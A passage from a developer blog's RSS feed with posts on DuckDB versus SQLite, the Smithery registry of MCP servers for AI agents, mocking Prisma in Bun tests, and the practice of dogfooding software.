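<p>Both produce the same answer, but on wide tables with millions of rows the columnar scan reads only a fraction of the data.</p>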
<h2 id="heading-3-optimized-query-execution">3. Optimized Query Execution</h2>
<p>DuckDB features a sophisticated query optimizer that analyzes queries and chooses the most efficient execution plan. Its techniques and design choices include:</p>
<ul>
<li><p><strong>Vectorized Processing</strong> - Operations are performed on batches of data (vectors) at a time, leveraging CPU parallelism for significant speedups.</p>
</li>
<li><p><strong>Just-In-Time(JIT) Compilation</strong>- Parts of the query execution plan can be compiled to native machine code during runtime, allowing for further optimization.</p>
</li>
<li><p><strong>Pushdown of Operations</strong> - DuckDB can push down operations like filters and aggregations to storage so that only the necessary data is read from storage.</p>
</li>
<li><p><strong>SQL Standard Compliance</strong> - It aims for a high degree of SQL standard compliance, making it easier to migrate existing SQL code and learn the database.</p>
</li>
<li><p><strong>Extensibility</strong> - DuckDB supports extensions for reading various file formats (CSV, Parquet, JSON, Excel) directly, integrating with other data sources like PostgreSQL, and adding custom functions and aggregations.</p>
</li>
<li><p><strong>Focus on Read-Heavy Workloads</strong>: DuckDB is optimized for read-heavy workloads, which are common in data analysis and reporting. Writes are supported, but their performance is not as optimized as reads.</p>
</li>
<li><p><strong>Designed for Analytics</strong>: Its primary use case is analyzing data, making it a good choice for data scientists, analysts, and anyone working with large datasets for reporting, dashboards, and exploratory analysis.</p>
</li>
</ul>
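<p>Of these, vectorized processing is the easiest to picture: instead of dispatching the query plan once per row, each operator consumes a fixed-size batch of values at a time. A simplified sketch (illustrative only, though 2048 values is DuckDB's real standard vector size):</p>

```typescript
const VECTOR_SIZE = 2048;

// A tiny "operator" that filters and sums one column, one batch at a time.
function sumWhereAbove(values: Float64Array, threshold: number): number {
  let total = 0;
  for (let start = 0; start < values.length; start += VECTOR_SIZE) {
    // subarray clamps past the end, so the last batch may be shorter.
    const batch = values.subarray(start, start + VECTOR_SIZE);
    // Tight loop over a contiguous batch: cache-friendly and cheap to dispatch.
    for (let i = 0; i < batch.length; i++) {
      if (batch[i] > threshold) total += batch[i];
    }
  }
  return total;
}

const data = new Float64Array(10_000).map((_, i) => i % 10);
console.log(sumWhereAbove(data, 7)); // 17000 (the sum of all the 8s and 9s)
```

<p>Real engines push this further by pairing batch execution with columnar storage, so each vector is already contiguous in memory.</p>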
<h2 id="heading-4-comparison-of-duckdb-vs-sqlite"><strong>4. Comparison of DuckDB vs SQLite</strong></h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Feature</strong></td><td><strong>DuckDB</strong></td><td><strong>SQLite</strong></td></tr>
</thead>
<tbody>
<tr>
<td><strong>Primary Use Case</strong></td><td>Analytical (OLAP)</td><td>General Purpose (OLTP, Small OLAP)</td></tr>
<tr>
<td><strong>Storage</strong></td><td>Columnar</td><td>Row-oriented</td></tr>
<tr>
<td><strong>Performance</strong></td><td>Faster for complex analytical queries on larger datasets</td><td>Faster for transactional (OLTP)</td></tr>
<tr>
<td><strong>Query Optimization</strong></td><td>Optimized for large datasets</td><td>Works well for small to medium datasets, slow with very large dataset</td></tr>
<tr>
<td><strong>Concurrency</strong></td><td>Limited write concurrency</td><td>Good read and write concurrency</td></tr>
<tr>
<td><strong>Server</strong> <strong>Required</strong></td><td>No</td><td>No</td></tr>
</tbody>
</table>
</div><h2 id="heading-5-installation-of-duckdb">5. Installation of DuckDB</h2>
<p>DuckDB has client libraries for languages including Python, R, Rust, Node.js, Java, and Go, plus an ODBC driver; you can find the installation steps for each in the official documentation - <a target="_blank" href="https://duckdb.org/docs/stable/">https://duckdb.org/docs/stable/</a></p>
<h2 id="heading-6-tools-powered-by-duckdb">6. Tools Powered by DuckDB</h2>
<ul>
<li><p><a target="_blank" href="https://github.com/rilldata/rill">Rill Data</a> - Tool for effortlessly transforming data sets into powerful, opinionated dashboards using SQL.</p>
</li>
<li><p><a target="_blank" href="https://ibis-project.org/">Ibis Project</a> - A DataFrame API for interacting with DuckDB (and other compute engines).</p>
</li>
<li><p><a target="_blank" href="https://boilingdata.com/">Boiling Data</a> - Serverless data analytics overlay on top of S3 Data Lakes.</p>
</li>
<li><p><a target="_blank" href="https://learn.hex.tech/docs/explore-data/cells/sql-cells/sql-cells-introduction">Hex Dataframe SQL</a> - Hex's Dataframe SQL cells are powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://mode.com/blog/how-we-switched-in-memory-data-engine-to-duck-db-to-boost-visual-data-exploration-speed/">Mode</a> - Mode uses DuckDB for their in-memory data engine.</p>
</li>
<li><p><a target="_blank" href="https://vulcansql.com/">VulcanSQL</a> - DuckDB can be used as a caching layer or a data connector in VulcanSQL, a Data API framework for data folks to create REST APIs by writing SQL templates.</p>
</li>
<li><p><a target="_blank" href="https://www.tadviewer.com/">Tad</a> - A fast, free, cross-platform tabular data viewer application powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://www.honeycombmaps.com/">Honeycomb Maps</a> - A browser-based geospatial analysis tool leveraging DuckDB-Wasm.</p>
</li>
<li><p><a target="_blank" href="https://www.bauplanlabs.com/">Bauplan</a> - A serverless data transformation platform for data lakes.</p>
</li>
<li><p><a target="_blank" href="https://www.malloydata.dev/">Malloy</a> - Malloy is an experimental language for describing data relationships and transformations. Malloy connects to BigQuery, Snowflake, Trino, and Postgres, and natively supports DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://evidence.dev/">Evidence</a> - Generate reports using SQL and markdown. The DuckDB connector allows querying across DuckDB, CSV, Parquet and JSON.</p>
</li>
<li><p><a target="_blank" href="https://latitude.so/">Latitude</a> - Latitude uses DuckDB to power data snapshots. Drop a CSV file and query it with SQL at the speed of light.</p>
</li>
<li><p><a target="_blank" href="https://www.getcensus.com/">Census</a> - Census's dataset diffing for incremental syncs is powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/rpbouman/huey">Huey</a> - Blazing-fast &amp; intuitive pivot tables on Parquet, CSV, JSON files and DuckDB tables in the browser, based on DuckDB-Wasm. Open-source (MIT). Zero install!</p>
</li>
<li><p><a target="_blank" href="https://marketplace.visualstudio.com/items?itemName=AdamViola.parquet-explorer">Parquet Explorer</a> - Visual Studio Code extension for exploring Parquet files with SQL, powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://dqops.com/">DQOps</a> - Data quality platform for data engineers, data quality teams and data operations.</p>
</li>
<li><p><a target="_blank" href="https://github.com/javitorres/datalakeStudio">DatalakeStudio</a> - Load, explore, transform your datasets and expose them via API. Integration with external APIs, S3, PostgreSQL and ChatGPT.</p>
</li>
<li><p><a target="_blank" href="https://github.com/spiceai/spiceai">Spice.ai</a> - A unified SQL query interface and portable runtime to locally materialize (using an embedded DuckDB), accelerate, and query datasets from any database, data warehouse, or data lake.</p>
</li>
<li><p><a target="_blank" href="https://www.definite.app/">Definite</a> - Definite pulls all your data into a single place for analytics and dashboards. No engineering or SQL required. Get a managed data warehouse (DuckDB), ELT, data modeling / transformations and BI in a single platform.</p>
</li>
<li><p><a target="_blank" href="https://github.com/amphi-ai/amphi-etl">Amphi ETL</a> - Low-code data pipelines for structured and unstructured data. SQL transformations are powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/metrico/quackpipe">Quackpipe</a> - Serverless OLAP API/UI built on top of DuckDB with basic ClickHouse API compatibility and MotherDuck support.</p>
</li>
<li><p><a target="_blank" href="https://github.com/buremba/universql">UniverSQL</a> - An implementation of Snowflake API, enables running queries on Snowflake tables locally with DuckDB without a running warehouse.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ajl2718/whereabouts">Whereabouts</a> - Fast, accurate, open-source geocoding in Python, using DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/lalabuy948/PhoenixAnalytics">Phoenix Analytics</a> - Plug and play analytics for Phoenix applications, powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/tobymao/sqlglot">SQLGlot</a> - Python transpiler that translates between 24 different SQL dialects including DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/Bl3f/yato">yato</a> - The smallest DuckDB SQL orchestrator on Earth.</p>
</li>
<li><p><a target="_blank" href="https://github.com/TobikoData/sqlmesh">SQLMesh</a> - A next-generation data transformation and modeling framework with support for DuckDB connections for state, transformations &amp; running unit tests locally.</p>
</li>
<li><p><a target="_blank" href="https://github.com/danilo-css/analytics-data-pivot">ADPivot</a> - No code tool built on top of DuckDB-Wasm and Pyodide that helps build pivot tables from databases of any size with a few clicks.</p>
</li>
<li><p><a target="_blank" href="https://kepler.gl/">Kepler.gl</a> - Kepler.gl is a powerful open-source geospatial analysis tool for large-scale data sets, now embeds duckdb wasm to create geospatial layers.</p>
</li>
<li><p><a target="_blank" href="https://github.com/wylie102/duckdb.yazi">duckdb.yazi</a> - Preview csv/tsv, json, and Parquet files in the yazi file manager using duckdb. View the raw data, or a "summarized" view with data-types, min, max, avg etc. for all columns.</p>
</li>
<li><p><a target="_blank" href="https://www.greybeam.ai/">Greybeam</a> - Routes your Snowflake queries to a DuckDB powered warehouse to reduce costs and speed up queries.</p>
</li>
<li><p><a target="_blank" href="https://datakit.page/">Datakit</a> - The privacy-first data analysis toolkit.</p>
</li>
<li><p><a target="_blank" href="https://github.com/turbot/tailpipe">Tailpipe</a> - An open-source SIEM for instant log insights.</p>
</li>
<li><p><a target="_blank" href="https://github.com/realdatadriven/etlx">ETLX</a> - DuckDB-powered ETL tool written in Go, inspired by evidence.dev’s syntax. It uses a structured Markdown config where heading levels define nested blocks, yaml code blocks specify metadata, and sql code blocks handle data interactions. Enables clean, code-light orchestration with minimal setup.</p>
</li>
<li><p><a target="_blank" href="https://hugr-lab.github.io/">Hugr</a> - An data mesh platform and high-performance GraphQL backend powered by DuckDB.</p>
</li>
</ul>
<h2 id="heading-final-notes">Final Notes</h2>
<p>DuckDB excels at analytical workloads, leveraging columnar storage and advanced query optimization techniques for speed. It is suited to data science, reporting, and applications where large datasets are queried often.</p>
<p>SQLite is a general-purpose database that is best suited for transactional applications and smaller datasets, and is designed for ease of use and embeddability.</p>
<p>Choose the database that best fits your specific needs and workload.</p>
]]></content:encoded></item><item><title><![CDATA[Supercharge Your AI Agents with Smithery AI: The MCP Registry You Need to Know]]></title><description><![CDATA[AI agents are evolving fast—from just chatbots to context-aware powerhouses that can browse the web, query databases, automate dev tasks, and even control smart home devices. But how exactly do you plug an LLM into real-world tools safely and efficie...]]></description><link>https://blog.nidhin.dev/supercharge-your-ai-agents-with-smithery-ai-the-mcp-registry-you-need-to-know</link><guid isPermaLink="true">https://blog.nidhin.dev/supercharge-your-ai-agents-with-smithery-ai-the-mcp-registry-you-need-to-know</guid><category><![CDATA[AI]]></category><category><![CDATA[#ai-tools]]></category><category><![CDATA[agentic AI]]></category><category><![CDATA[smithery]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 28 Jun 2025 17:06:35 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1751125160077/aae43ae7-a437-4ddd-b516-f5c3fb31f033.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AI agents are evolving fast—from just chatbots to context-aware powerhouses that can browse the web, query databases, automate dev tasks, and even control smart home devices. But how exactly do you plug an LLM into real-world tools safely and efficiently?</p>
<p>That’s where Smithery AI comes in.</p>
<h3 id="heading-what-is-smithery-ai">What Is Smithery AI?</h3>
<p>Think of <strong>Smithery AI</strong> as a <strong>package manager and registry for AI tools</strong>—but not the usual Python/Node packages. Instead, it catalogs <strong>MCP (Model Context Protocol) servers</strong>, tiny APIs or plugins that extend the capabilities of large language models (LLMs) like Claude, GPT, or open-source agents.</p>
<p>Need GitHub access for your AI agent? There’s an MCP server for that. Want your LLM to query SQL databases or automate browser actions? Yup, there’s one for that too.</p>
<p>Smithery helps you discover, install, and manage these servers either:</p>
<ul>
<li><p><strong>Locally</strong>: Everything runs on your machine, tokens never leave.</p>
</li>
<li><p><strong>Remotely</strong>: Hosted by Smithery, convenient for fast prototyping.</p>
</li>
</ul>
<h3 id="heading-what-you-can-do-with-it">What you can do with it</h3>
<p>Here are some real-world use cases where Smithery + MCP servers shine:</p>
<ul>
<li><p><strong>GitHub MCP</strong>: Let your agent search issues, PRs, or even suggest reviews.</p>
</li>
<li><p><strong>PostgreSQL/SQL MCPs</strong>: Ask your LLM to analyze your data tables.</p>
</li>
<li><p><strong>Web MCPs</strong>: Build agents that browse and summarize web pages.</p>
</li>
<li><p><strong>Playwright MCP</strong>: Control browser sessions for automated testing via LLM prompts.</p>
</li>
<li><p><strong>Local file system access</strong>: Let agents read/write files (with strict permission control).</p>
</li>
</ul>
<p>With <strong>200+ MCP servers</strong> available, the ecosystem is growing fast.</p>
<h3 id="heading-installing-an-mcp-server">Installing an MCP Server</h3>
<p>To install the GitHub MCP locally, run the following command:</p>
<pre><code class="lang-bash">smithery install --server=github.com/smithery-ai/mcp-github --token=$GITHUB_TOKEN
</code></pre>
<p>This spins up the GitHub MCP on your local machine and gives you a <code>.well-known/mcp</code> descriptor for any LLM client to hook into.</p>
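<p>Because that descriptor lives at a conventional well-known path, a client can locate it with plain HTTP. Here is a hedged sketch (the helper names and the localhost URL are illustrative, not part of Smithery's CLI or SDK):</p>

```typescript
// Build the well-known URL for a server's MCP descriptor.
export function mcpDescriptorUrl(baseUrl: string): string {
  return new URL("/.well-known/mcp", baseUrl).toString();
}

// Fetch and parse the descriptor so an LLM client can discover the server.
export async function fetchMcpDescriptor(baseUrl: string): Promise<unknown> {
  const res = await fetch(mcpDescriptorUrl(baseUrl));
  if (!res.ok) throw new Error(`MCP descriptor request failed: HTTP ${res.status}`);
  return res.json();
}

console.log(mcpDescriptorUrl("http://localhost:3000"));
// http://localhost:3000/.well-known/mcp
```

<p>Any MCP-aware client can then use the descriptor's contents to wire the server's tools into the model's context.</p>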
<p>Boom. You’ve just given your AI superpowers.</p>
<h3 id="heading-is-it-safe">Is It Safe?</h3>
<p>A few community folks <a target="_blank" href="https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/">raised concerns on Reddit</a> about early versions of the Smithery CLI being minified, making it hard to audit. The devs responded quickly, pledging to open-source everything.</p>
<p>Until then, <strong>use local mode with caution</strong>—just like you would with any CLI that handles access tokens. For hosted servers, Smithery claims tokens are passed ephemerally and never stored long-term.</p>
<p>Smithery also supports developers building their own AI-driven tools. If you're writing a React app, backend service, or your own agent framework, there's a <strong>TypeScript SDK</strong> and API spec to connect to hosted MCPs.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>Smithery AI feels like a missing piece in the AI agent puzzle. Instead of reinventing tool integrations every time, you get a standardised, modular plug-and-play system.</p>
<p>And with the open MCP standard, you're not locked in—you can mix and match servers, clients, and hosts.</p>
<p>If you're building anything agentic, LLM-enhanced, or just plain nerdy... this is worth exploring.</p>
<h3 id="heading-resources-links">Resources Links</h3>
<ol>
<li><p>Smithery AI Docs - <a target="_blank" href="https://smithery.ai/docs">https://smithery.ai/docs</a></p>
</li>
<li><p>GitHub MCP - <a target="_blank" href="https://github.com/smithery-ai/mcp-github">https://github.com/smithery-ai/mcp-github</a></p>
</li>
<li><p>Reddit Discussion - <a target="_blank" href="https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/">https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Mock Prisma Schema in Bun Tests]]></title><description><![CDATA[Writing unit tests for your code is usually straightforward when using popular test frameworks like Jest or Vitest. You can easily mock dependencies and focus your specs on specific units of logic. However, when working with Bun — especially if you’r...]]></description><link>https://blog.nidhin.dev/mock-prisma-schema-in-bun-tests</link><guid isPermaLink="true">https://blog.nidhin.dev/mock-prisma-schema-in-bun-tests</guid><category><![CDATA[buntest]]></category><category><![CDATA[Bun]]></category><category><![CDATA[Testing]]></category><category><![CDATA[prisma]]></category><category><![CDATA[unit testing]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 22 Jun 2025 14:58:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1750604176345/49b4c80d-ef1c-4879-a46c-7473da8ee4ce.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Writing unit tests for your code is usually straightforward when using popular test frameworks like <strong>Jest</strong> or <strong>Vitest</strong>. You can easily mock dependencies and focus your specs on specific units of logic. However, when working with <strong>Bun</strong> — especially if you’re trying to mock Prisma database interactions — things can be a bit different.</p>
<p>In this post, we’ll explore two approaches for mocking Prisma in Bun.</p>
<h2 id="heading-1spying-on-methods-with-spyon">1. Spying on Methods with <code>spyOn</code></h2>
<p>If you want to track method calls (like Prisma Client methods), you can use Bun’s built-in <code>spyOn</code> method from <code>bun:test</code>. This is ideal when you just want to observe behavior and assert how methods were called.</p>
<h3 id="heading-example">Example</h3>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { test, expect, spyOn } <span class="hljs-keyword">from</span> <span class="hljs-string">"bun:test"</span>;
<span class="hljs-keyword">import</span> { PrismaClient } <span class="hljs-keyword">from</span> <span class="hljs-string">"@prisma/client"</span>;

<span class="hljs-keyword">const</span> prisma = <span class="hljs-keyword">new</span> PrismaClient();

test(<span class="hljs-string">"should find user by id"</span>, <span class="hljs-keyword">async</span> () =&gt; {
  <span class="hljs-keyword">const</span> spy = spyOn(prisma.user, <span class="hljs-string">"findUnique"</span>);
  spy.mockResolvedValue(<span class="hljs-literal">null</span>); <span class="hljs-comment">// stub the query so the test never hits a real database</span>
  <span class="hljs-keyword">await</span> prisma.user.findUnique({ where: { id: <span class="hljs-number">1</span> } });
  expect(spy).toHaveBeenCalledTimes(<span class="hljs-number">1</span>);
  expect(spy.mock.calls[<span class="hljs-number">0</span>][<span class="hljs-number">0</span>]).toEqual({ where: { id: <span class="hljs-number">1</span> } });
});
</code></pre>
<h2 id="heading-2mock-the-entire-module">2. Mock the Entire Module</h2>
<p>Consider this example: we have a function that fetches a user from the database based on an ID.</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { getDbClient } <span class="hljs-keyword">from</span> <span class="hljs-string">'~/lib/getDbClient'</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">findUser</span>(<span class="hljs-params">id: <span class="hljs-built_in">number</span></span>) </span>{
  <span class="hljs-keyword">const</span> db = getDbClient();
  <span class="hljs-keyword">const</span> user = <span class="hljs-keyword">await</span> db.user.findUnique({ where: { entity_id: id } });

  <span class="hljs-keyword">if</span> (!user) <span class="hljs-keyword">return</span> { status: <span class="hljs-string">'redirect'</span>, redirectUrl: <span class="hljs-string">'/login'</span> };

  <span class="hljs-keyword">return</span> { status: <span class="hljs-string">'valid'</span>, user };
}
</code></pre>
<p>Here, <code>getDbClient()</code> returns the Prisma instance, and we use its <code>findUnique()</code> method to locate a user.</p>
<h3 id="heading-the-challenge">The Challenge</h3>
<p>If we try to test this directly, it will attempt to call the actual database. That’s undesirable for a unit test, so we need a way to <strong>mock the Prisma client</strong>.</p>
<h3 id="heading-the-solution-mockmodule">The Solution: <code>mockModule</code></h3>
<p>We can accomplish this using Bun’s <code>mock.module()</code> method. Here’s how:</p>
<h4 id="heading-creating-a-mock-user">Creating a Mock User</h4>
<p>First, we create a helper method:</p>
<pre><code class="lang-typescript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">createMockUser</span>(<span class="hljs-params">overrides: Partial&lt;UserEntity&gt; = {}</span>): <span class="hljs-title">UserEntity</span> </span>{
  <span class="hljs-keyword">const</span> defaultUser = {
    email: <span class="hljs-string">'john@example.com'</span>,
    created_at: <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>(),
    updated_at: <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>(),
    is_active: <span class="hljs-number">1</span>,
    firstname: <span class="hljs-string">'John'</span>,
    lastname: <span class="hljs-string">'Doe'</span>,
    dob: <span class="hljs-literal">null</span>,
    gender: <span class="hljs-literal">null</span>,
    password_hash: <span class="hljs-literal">null</span>,
  };

  <span class="hljs-keyword">return</span> {
    ...defaultUser,
    ...overrides,
  };
}
</code></pre>
<h4 id="heading-writing-the-spec">Writing the Spec</h4>
<p>Then we write the spec, mocking the database client with <code>mockModule()</code>:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { afterEach, beforeEach, describe, expect, it, mock } <span class="hljs-keyword">from</span> <span class="hljs-string">'bun:test'</span>;
<span class="hljs-keyword">import</span> { mockModule } <span class="hljs-keyword">from</span> <span class="hljs-string">'~/lib/mockModule'</span>;
<span class="hljs-keyword">import</span> { findUser } <span class="hljs-keyword">from</span> <span class="hljs-string">'~/lib/findUser'</span>; <span class="hljs-comment">// path assumed; adjust to wherever findUser lives</span>

describe(<span class="hljs-string">'findUser'</span>, <span class="hljs-function">() =&gt;</span> {
  beforeEach(<span class="hljs-function">() =&gt;</span> {
    mock.module(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({}));
  });

  afterEach(<span class="hljs-function">() =&gt;</span> {
    mock.restore();
  });

  it(<span class="hljs-string">'should redirect if user not found'</span>, <span class="hljs-keyword">async</span> () =&gt; {
    using mocked = <span class="hljs-keyword">await</span> mockModule(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({
      getDbClient: <span class="hljs-function">() =&gt;</span> ({
        user: {
          findUnique: <span class="hljs-function">() =&gt;</span> <span class="hljs-literal">null</span>,
        },
      }),
    }));

    <span class="hljs-keyword">const</span> result = <span class="hljs-keyword">await</span> findUser(<span class="hljs-number">1</span>);
    assertRedirect(result, <span class="hljs-string">'/login'</span>);
  });

  it(<span class="hljs-string">'should return valid user'</span>, <span class="hljs-keyword">async</span> () =&gt; {
    <span class="hljs-keyword">const</span> mockUser = createMockUser();

    using mocked = <span class="hljs-keyword">await</span> mockModule(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({
      getDbClient: <span class="hljs-function">() =&gt;</span> ({
        user: {
          findUnique: <span class="hljs-function">() =&gt;</span> mockUser,
        },
      }),
    }));

    <span class="hljs-keyword">const</span> result = <span class="hljs-keyword">await</span> findUser(<span class="hljs-number">1</span>);
    expect(result.status).toBe(<span class="hljs-string">'valid'</span>);
    <span class="hljs-keyword">if</span> (result.status === <span class="hljs-string">'valid'</span>) {
      expect(result.user).toEqual(mockUser);
    }
  });
});
</code></pre>
<h3 id="heading-the-mockmodule-utility">The <code>mockModule</code> Utility</h3>
<p>Here’s the helper used to swap in and restore mock implementations:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { mock } <span class="hljs-keyword">from</span> <span class="hljs-string">'bun:test'</span>;

<span class="hljs-comment">/**
 * Mocks a module by merging its actual exports with custom implementations.
 */</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> mockModule = <span class="hljs-keyword">async</span> (
  modulePath: <span class="hljs-built_in">string</span>,
  renderMocks: <span class="hljs-function">() =&gt;</span> Record&lt;<span class="hljs-built_in">string</span>, <span class="hljs-built_in">any</span>&gt;
) =&gt; {
  <span class="hljs-keyword">const</span> original = { ...(<span class="hljs-keyword">await</span> <span class="hljs-keyword">import</span>(modulePath)) };
  <span class="hljs-keyword">const</span> mocks = renderMocks();
  <span class="hljs-keyword">const</span> result = {
    ...original,
    ...mocks,
  };
  mock.module(modulePath, <span class="hljs-function">() =&gt;</span> result);
  <span class="hljs-keyword">return</span> {
    [<span class="hljs-built_in">Symbol</span>.dispose]: <span class="hljs-function">() =&gt;</span> {
      mock.module(modulePath, <span class="hljs-function">() =&gt;</span> original);
    },
  };
};
</code></pre>
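<p>The <code>Symbol.dispose</code> key is what makes the <code>using</code> declarations in the spec work: when the variable goes out of scope, its dispose method runs automatically, restoring the original module even if the test throws. A minimal standalone illustration of that mechanism (requires a runtime with explicit resource management, such as Bun or TypeScript 5.2+):</p>

```typescript
const log: string[] = [];

// A disposable "resource", analogous to the object mockModule returns.
function scopedMock(name: string) {
  log.push(`install ${name}`);
  return {
    [Symbol.dispose]: () => log.push(`restore ${name}`),
  };
}

{
  using mocked = scopedMock("getDbClient");
  log.push("test body runs");
} // dispose fires here automatically, restoring the original

console.log(log); // install getDbClient, test body runs, restore getDbClient
```

<p>This is why each <code>it()</code> block above gets a fresh mock that is cleaned up without any manual teardown code.</p>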
<p>With this approach, you can effectively <strong>mock Prisma instances</strong> in Bun, making your specs focused and independent of actual database connections — all without relying on Jest or Vitest.</p>
<p>If you’re migrating to Bun or starting fresh, this method gives you a clean, reliable way to test database-related logic in isolation.</p>
]]></content:encoded></item><item><title><![CDATA[Eat your dogfood - Why DogFooding Your Product is a Game-Changer]]></title><description><![CDATA[“Eat your own dog food” — it’s a phrase you have probably heard in tech circles. But behind the quirky metaphor lies a powerful practice: dogfooding.
In software development, dogfooding means using your own product in real-world scenarios before or wh...]]></description><link>https://blog.nidhin.dev/eat-your-dogfood-why-dogfooding-your-product-is-a-game-changer</link><guid isPermaLink="true">https://blog.nidhin.dev/eat-your-dogfood-why-dogfooding-your-product-is-a-game-changer</guid><category><![CDATA[dogfooding]]></category><category><![CDATA[ProductDogfooding]]></category><category><![CDATA[software development]]></category><category><![CDATA[product development]]></category><category><![CDATA[developer experience]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 01 Jun 2025 15:20:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1748791096407/b05647a3-4d89-4a11-a10f-c3318ec5ddc2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>“Eat your own dog food” — it’s a phrase you have probably heard in tech circles. But behind the quirky metaphor lies a powerful practice: <strong>dogfooding</strong>.</p>
<p>In software development, dogfooding means using your own product in real-world scenarios before or while you ship it to customers. It’s about living the user experience, warts and all.</p>
<p>So why do companies like Microsoft, Google, and Facebook dogfood their products? And should your team do it too?</p>
<h1 id="heading-what-is-dogfooding">What is Dogfooding?</h1>
<p>Dogfooding is the practice of a company using its own software internally to test features, uncover issues, and improve usability before public release. For example:</p>
<ul>
<li><p>Microsoft employees use early versions of Windows and Office internally.</p>
</li>
<li><p>Twitter staff tested their algorithm changes on internal accounts before rolling them out.</p>
</li>
</ul>
<p>It’s one of the most immediate and honest feedback loops you can create.</p>
<h1 id="heading-why-dogfooding-works">Why Dogfooding Works</h1>
<h4 id="heading-1-faster-feedback-loops">1. <strong>Faster Feedback Loops</strong></h4>
<p>Instead of waiting for external beta testers to report bugs, your internal team finds them during daily use. This makes it easier to catch edge cases and usability quirks before your users do.</p>
<h4 id="heading-2-builds-empathy-for-users">2. <strong>Builds Empathy for Users</strong></h4>
<p>Dogfooding forces the product and engineering teams to experience the friction that real users face. It builds empathy — and urgency — to fix things that slow people down.</p>
<h4 id="heading-3-encourages-quality-and-accountability">3. <strong>Encourages Quality and Accountability</strong></h4>
<p>It’s harder to let subpar features slide when your own team depends on them. There’s a natural incentive to deliver well-tested, user-friendly software.</p>
<h4 id="heading-4-improves-cross-functional-alignment">4. <strong>Improves Cross-Functional Alignment</strong></h4>
<p>Sales, marketing, and support teams get to understand the product deeply, helping them communicate value more effectively and identify gaps.</p>
<h1 id="heading-when-dogfooding-goes-wrong">When Dogfooding Goes Wrong</h1>
<p>Dogfooding isn't a silver bullet. Sometimes it gives you <strong>false confidence</strong>.</p>
<ul>
<li><p><strong>You're not your user</strong>: Your team likely has more technical skill or context than your actual audience. What’s intuitive to you may be baffling to them.</p>
</li>
<li><p><strong>Internal bias</strong>: Team members might overlook bugs or quirks because they’re “used to it.”</p>
</li>
<li><p><strong>Overfitting to internal use cases</strong>: You might optimize features for internal workflows that don’t reflect broader customer needs.</p>
</li>
</ul>
<p>Dogfooding is useful, but it must be balanced with external feedback.</p>
<h1 id="heading-best-practices-for-dogfooding">Best Practices for Dogfooding</h1>
<p>Here’s how to get the most out of dogfooding:</p>
<ol>
<li><p><strong>Define Clear Use Cases</strong><br /> Don’t just use it and move on. Set goals. Which workflows should teams test? What metrics or behaviours do you want to observe?</p>
</li>
<li><p><strong>Make It Easy to Report Feedback</strong><br /> Streamline the path from observation to action. Use Slack bots, feedback forms, or tools like Productboard or Linear to gather internal insights.</p>
</li>
<li><p><strong>Rotate Fresh Eyes In</strong><br /> New hires and non-technical staff often catch usability issues that engineers overlook. Rotate testers to get fresh perspectives.</p>
</li>
<li><p><strong>Don’t Rely on Dogfooding Alone</strong><br /> Combine it with external beta testing, UX research, and A/B testing. Dogfooding complements — but doesn’t replace — real-world validation.</p>
</li>
<li><p><strong>Celebrate and Act on Discoveries</strong><br /> Highlight issues found through dogfooding, and close the loop when they’re fixed. This keeps morale high and shows that internal feedback matters.</p>
</li>
</ol>
<p>Dogfooding is one of the most powerful, practical ways to build better software — fast. It creates a culture of ownership, pride, and user-centric thinking. But like any tool, it works best when paired with the humility to recognise that internal users aren’t the final word.</p>
<p>If you build it, use it. Then make it better for everyone else.</p>
]]></content:encoded></item></channel></rss>